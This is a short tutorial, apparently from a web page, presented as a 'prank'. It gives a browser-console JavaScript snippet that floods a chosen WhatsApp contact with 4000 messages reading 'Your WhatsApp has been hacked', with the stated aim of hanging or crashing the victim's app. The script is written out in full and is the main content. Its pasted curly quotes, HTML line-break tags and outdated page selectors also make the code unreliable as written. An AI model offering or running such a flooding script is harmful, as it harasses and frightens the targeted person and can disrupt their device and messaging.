Lots of messages can hang and even crash WhatsApp, when they are lots (like, in 1000s). Here we are going to bombard victim's WhatsApp with 4000 messages. So, if you want to do this prank with your friend, open your WhatsApp in Chrome. press
CTRL + SHIFT + J (to open console) and paste this script inside it:
// control + shift + j to open console and paste<br/>
var count = 4000; //number of times to send<br/>
var message = “Your WhatsApp has been hacked “; //spam message<br/>
var i = 0;var timer = setInterval(function() {<br/>
var evt = document.createEvent(“TextEvent”);<br/>
evt.initTextEvent(“textInput”, true, true, window, message + i, 0, “en-US”);<br/>
document.querySelector(“.input-container .input”).focus();<br/>
document.querySelector(“.input-container .input”).dispatchEvent(evt);<br/>
i++;if (i == count)clearInterval(timer);console.log(i + ” messages sent”);var event = new MouseEvent(‘click’, {‘view’: window,’bubbles’: true,’cancelable’: true});document.querySelector(“.icon.btn-icon.icon-send”).dispatchEvent(event);}, 10);
Copy code
After pasting this script, hit ENTER and it will start sending the message "
Your WhatsApp has been hacked" to the target victim and won't stop before 4000.